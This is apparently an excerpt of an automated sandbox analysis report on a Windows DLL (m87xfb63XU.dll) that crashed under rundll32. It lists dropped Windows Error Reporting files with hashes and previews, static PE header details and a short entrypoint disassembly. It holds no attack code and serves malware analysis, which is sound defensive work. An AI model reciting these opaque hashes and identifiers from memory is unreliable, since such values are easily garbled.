                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.7.8.7.2.3.0.5.2.4.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.7.8.7.7.6.6.4.6.1.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.1.8.a.a.6.7.-.0.9.5.b.-.4.2.e.c.-.a.b.e.7.-.3.3.b.d.0.5.a.3.1.a.3.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.5.3.5.e.c.3.-.d.1.6.9.-.4.2.e.6.-.b.9.1.9.-.b.e.8.3.1.2.5.2.8.e.e.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.3.c.-.0.0.0.1.-.0.0.1.c.-.8.e.8.b.-.a.6.d.2.3.b.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_58e47b16956767aaab6459884ff9566934c5f_82810a17_12494a43\Report.wer
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):12038
                                                                                      Entropy (8bit):3.764900859024697
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:KC4iT0oX+HBUZMX4jed+x/u7sMS274It7ca:h4iNX2BUZMX4je8/u7sMX4It7ca
                                                                                      MD5:9B5E9E424EA5CFD77CBF080009E761AB
                                                                                      SHA1:A85C669A2C4820B53803516D9D563A11CE64E6DA
                                                                                      SHA-256:B7FEB953DCE8100B907FC7BADC6CD3B5D853C8634600918BEDB24C5CAE2C529E
                                                                                      SHA-512:EDB1091FACF84E50700F54CE6387EF2F1929A81AE0E830121F19255CFACEE1E501E9DCF33C6F02A647B113D855E2A0335FBE71EBAA324B9E28F94D6D194294CF
                                                                                      Malicious:false
                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.7.8.7.8.0.7.4.8.3.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.7.8.8.7.3.7.1.6.6.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.4.6.8.c.6.b.-.3.7.c.6.-.4.7.f.0.-.8.5.6.f.-.c.6.d.2.7.2.2.0.f.0.e.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.2.e.a.3.7.6.b.-.e.4.a.8.-.4.0.2.2.-.a.9.9.7.-.a.5.0.6.2.7.a.3.4.c.b.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.f.4.-.0.0.0.1.-.0.0.1.c.-.6.f.c.6.-.a.f.d.4.3.b.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_58e47b16956767aaab6459884ff9566934c5f_82810a17_1bc56378\Report.wer
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):12042
                                                                                      Entropy (8bit):3.7655405295675086
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:xkmio0oXCHBUZMX4jed+x/u7sMS274It7c6:imiOXaBUZMX4jec/u7sMX4It7c6
                                                                                      MD5:CB53F0494ED32D4398672C2FE4FB77D0
                                                                                      SHA1:08A86732128ECAED018F686C7462976321C4C2B5
                                                                                      SHA-256:675B69B33B8DD77A91E447650DCEC234B7014BA7AD89E9FFAA24DC1B842EC183
                                                                                      SHA-512:05F1464AA7E4894DCD9B4A15E6B841F558B2C8EADE33C4A10C29054D4392B2ED0781C7114EDC3438A328197A32E66B8B1E9C9A024768525649D0FA3F2D4E73A3
                                                                                      Malicious:false
                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.7.8.8.7.0.1.5.2.8.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.7.8.9.4.0.1.5.2.5.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.4.9.c.9.5.6.-.2.8.3.3.-.4.3.5.8.-.b.b.2.c.-.e.1.e.1.8.3.b.a.f.4.2.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.b.4.e.5.1.5.4.-.e.9.5.5.-.4.7.8.8.-.9.9.c.3.-.0.6.8.0.3.5.9.6.6.e.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.f.c.-.0.0.0.1.-.0.0.1.c.-.1.3.e.4.-.f.f.d.8.3.b.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1133.tmp.WERInternalMetadata.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8406
                                                                                      Entropy (8bit):3.6963803284121193
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Rrl7r3GLNiRjv64uT6YAD66njSCxpOmXgmf8NSqCprP89bbAsf3BJm:RrlsNiVv6nT6YK661xpOmXgmf8NSibTG
                                                                                      MD5:9A49EDBFE578048831C8820692773645
                                                                                      SHA1:F39D5F2D815959F9163B485338B03CC9A9865963
                                                                                      SHA-256:EF794768396D5D452BBF5DC0771328E8A3B9D6CB53402E4628275C4FA46CD39E
                                                                                      SHA-512:2C596404D46A368D7EB36C13BC9C624073DBA4A117FDD284B3F6442009CBE5E05D1F58F8699161CDB58B36FE8B108A48709FB6D7C2975D444329AFDC5649C753
                                                                                      Malicious:false
                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.6.8.<./.P.i.d.>.......
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER13C4.tmp.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4771
                                                                                      Entropy (8bit):4.483718466628636
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwSD8zsXJgtWI9TzWSC8BN58fm8M4JCdsPMFbJ+q8vjsPPX4SrS1d:uITf5UCSNCJd4JKmfDW1d
                                                                                      MD5:CE10A908A63D722AACF0E8D9BE1095F8
                                                                                      SHA1:17A9B4AE2DE575C2D7DAA39045AA4A4573F8198C
                                                                                      SHA-256:C8B824A19D5BB8A8DF2BE2EC44BAF0CD4805236B67701EA6E0829001085E1608
                                                                                      SHA-512:DFE78C8930F027EAEA01E6746E5B53617D636B5580B23E4FEF0CAA9F8A44E4BED39FC3B6386066A6F7CEBBC5CDDAD35D8676DA3BDA8EFB5585C179102087B14A
                                                                                      Malicious:false
                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206288" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1FB8.tmp.dmp
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:38:00 2021, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):35846
                                                                                      Entropy (8bit):2.385602420989254
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:6SttPXO4uuXjMvQ1IDZKltt/hBSuIS4FTQnnqMUnIIT+Gzn1:6aPXtQvQaKljCFTQnGXB1
                                                                                      MD5:37229BFFD03AE6C3D865065FB3BE8ADD
                                                                                      SHA1:4BC3A558CC16977F2A40CF5E39EBBE1CD0806B65
                                                                                      SHA-256:40C79A034538717B0ED6FD23396F07EE56F600240138BFAC04E4DE16A4949059
                                                                                      SHA-512:FB0D5F5BDA9A425BE058830F6E4E4F23FF17AEBCECF09C303C23C78BC9C4532B6BFD323639C69D758F33A3E012649BC50C9F3D1851EECF0809BBA27F395BABFA
                                                                                      Malicious:false
                                                                                      Preview: MDMP....... .......X;ea...................U...........B..............GenuineIntelW...........T............:ea"............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FB7.tmp.WERInternalMetadata.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8406
                                                                                      Entropy (8bit):3.698981960718667
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Rrl7r3GLNib46dAM6YA0967Xgmf8NSqCprhx89bhUsfmUrm:RrlsNiU6OM6Yr67gmf8NS6hHfmV
                                                                                      MD5:08261C667C95C097E00AE3CBC02E477F
                                                                                      SHA1:1322F296EACE346296D435C7168066A6F84BCA5E
                                                                                      SHA-256:97880BE30DE65452FE99D66A85FBE9073B3CDE3E383676D4FEB5684F1DF8C2B9
                                                                                      SHA-512:80B11539493CCC4A673073D28F4EF89BCAEC0743AFC13FAF3C7CA72F3D7A733E5FB5EFFA9C6BBD39D6DF76C634B759F9230F900BFE6B421286EB0BA222111DC4
                                                                                      Malicious:false
                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.9.6.<./.P.i.d.>.......
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER39AB.tmp.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4771
                                                                                      Entropy (8bit):4.482600507508291
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwSD8zsXJgtWI9TzWSC8B6Zs8fm8M4JCdsPMFfF+q8vjsPQ4SrS9d:uITf5UCSNAZRJdSFKmQDW9d
                                                                                      MD5:A90A74AFC22D249341C2902508382C0D
                                                                                      SHA1:F599F8A92AAB279535FF15D8B694D02EE4CF7684
                                                                                      SHA-256:798A106451D1029F1AD81469F050639B2E0BDBEADA592BCD561960727917B587
                                                                                      SHA-512:F3E2AF76C236909A0ECF19663C4B424A6A40DA9AD00FB44E99F4DE1B8C5859743A473B50422AD1675BDF4391C9B751E7DB9A3A0134E7C72C8373589E390420CC
                                                                                      Malicious:false
                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206288" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER42B2.tmp.dmp
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:38:10 2021, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):34582
                                                                                      Entropy (8bit):2.425575299184456
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:6t6NoAQPHlosUXjMvQ1IDZKttNvxiHK1tQPRRKeOXejvVMF:Y6NoAQ4QvQaKtl2kSPRkQve
                                                                                      MD5:70FB9A6E438E3B0B1A26356C9CEC31E6
                                                                                      SHA1:48AE79ADF9C6F37FCC652663C87CF254CC3E152A
                                                                                      SHA-256:9ECD153AED1B04D03D7752F02878B038342E08C6E54C4DEFEECDEFFC542D8850
                                                                                      SHA-512:CC2F86DF386CDAD82F86175DE5F21978869BED6F440F8F4FD1CBAF915EFB8C774DC018C0B8417C47F58DA648DAB129B7E65216CDA1F1FB544448E8598C607914
                                                                                      Malicious:false
                                                                                      Preview: MDMP....... .......b;ea...................U...........B..............GenuineIntelW...........T............:ea!............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5253.tmp.WERInternalMetadata.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8406
                                                                                      Entropy (8bit):3.6986354329795113
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Rrl7r3GLNiur6396YA867Xgmf8NSqCpr589bdgsf9/m:RrlsNiC6N6YL67gmf8NSEdzfo
                                                                                      MD5:41252F8B1133C148B7EA2C82407A8620
                                                                                      SHA1:ED34F8F81B2923EDD29E322B987C044B878F5764
                                                                                      SHA-256:E2862E4DA28D1E0D61E20AF6E760AEE93787BE950879C3BF9EE9BDF2DA997DB2
                                                                                      SHA-512:152478B4F8116B991DACE8C7C55195EF738DD61171EF88BC411DD6E6E0E9E041005C65E8589D9966EB381C2FAD992DC472F3278150749F11E52E0C6A9620A893
                                                                                      Malicious:false
                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.4.8.<./.P.i.d.>.......
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER55DE.tmp.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4771
                                                                                      Entropy (8bit):4.484228784189716
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwSD8zsXJgtWI9TzWSC8B4Q8fm8M4JCdsPMFwi+q8vjsPaq4SrSqd:uITf5UCSNytJdFiKmaqDWqd
                                                                                      MD5:A6C78841FF7E390BE1BE332B06DFFA0A
                                                                                      SHA1:36D18A2AC336480437565DF1C32EF77DB3E18D73
                                                                                      SHA-256:2C5D9822FC129B455EED5C821BB41ED04D1A9EE07982E3339B95A7EFEE9856E3
                                                                                      SHA-512:166FE8CB0CD60F27024A0BC673DF105E7090B327C4AAE2AB1FEEB63BA86600556B3FB6FE365E0353D3F64C7CB5037457DEF569232D0E87DE9AB7DD58374A52A5
                                                                                      Malicious:false
                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206288" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER933.tmp.dmp
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:37:54 2021, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):35606
                                                                                      Entropy (8bit):2.3965294893524645
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:AXuGzvX8OFMfPXjMvQ1IDZKjtvi2VGPZOR77nEnWK:GLzP8OFMHQvQaKjE2cPZORk9
                                                                                      MD5:FCABB6B003C518E48C5567C56F819B9A
                                                                                      SHA1:0DBEA94D03C091DBC56815F95140181C8300A2C8
                                                                                      SHA-256:8EECD01F90255527983209AAD276036206816555DEFE665D7202005D227FC907
                                                                                      SHA-512:63C365F992B87DF708E10FBBD36BC2E97570D42BB160AAD90B65791777AF8FB7ABE6897357F83F0CD431DEAB6DC987B024BA88DA0231C232F877795DED86699F
                                                                                      Malicious:false
                                                                                      Preview: MDMP....... .......R;ea...................U...........B..............GenuineIntelW...........T.......<....:ea"............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):6.669953219927633
                                                                                      TrID:
                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:m87xfb63XU.dll
                                                                                      File size:718336
                                                                                      MD5:5aa733e108f0fa41df88cea0a309affe
                                                                                      SHA1:ce79918ca7845f2163360ea40a251912998ea226
                                                                                      SHA256:1be687a0453f23ea53b94a4447c926a9b4b6e01c2788e641b76eb4a5215bd960
                                                                                      SHA512:e18ef98a6bb007ee0ef473cd05bad85ac2f177d316981658e17a12f182effbcc98754fbefc362a4212a8eebcc71fc2e2a15c865b08c50f5990223bcb55d001af
                                                                                      SSDEEP:12288:VUAQSxn6fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsR:Vz3xn6fq8Np6bTPPaBreaZlYCOSVol2u
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}.W.}.W.}.Wy..W.}.W..}W.}.W...V.}.W...V.}.W...V.}.Wy..W.}.W.}.WH|.W...VK}.W...V.}.W...V.}.W.}qW.}.W...V.}.WRich.}.W.......

                                                                                      File Icon

                                                                                      Icon Hash:74f0e4ecccdce0e4

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x1003ab77
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x10000000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                      Time Stamp:0x5F6FCA4E [Sat Sep 26 23:10:06 2020 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:6
                                                                                      OS Version Minor:0
                                                                                      File Version Major:6
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:6
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:b5c6badd398e2e3aa283a40a40432c6c

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      cmp dword ptr [ebp+0Ch], 01h
                                                                                      jne 00007F0D10C83E77h
                                                                                      call 00007F0D10C84962h
                                                                                      push dword ptr [ebp+10h]
                                                                                      push dword ptr [ebp+0Ch]
                                                                                      push dword ptr [ebp+08h]
                                                                                      call 00007F0D10C83D1Ah
                                                                                      add esp, 0Ch
                                                                                      pop ebp
                                                                                      retn 000Ch
                                                                                      mov ecx, dword ptr [ebp-0Ch]
                                                                                      mov dword ptr fs:[00000000h], ecx
                                                                                      pop ecx
                                                                                      pop edi
                                                                                      pop edi
                                                                                      pop esi
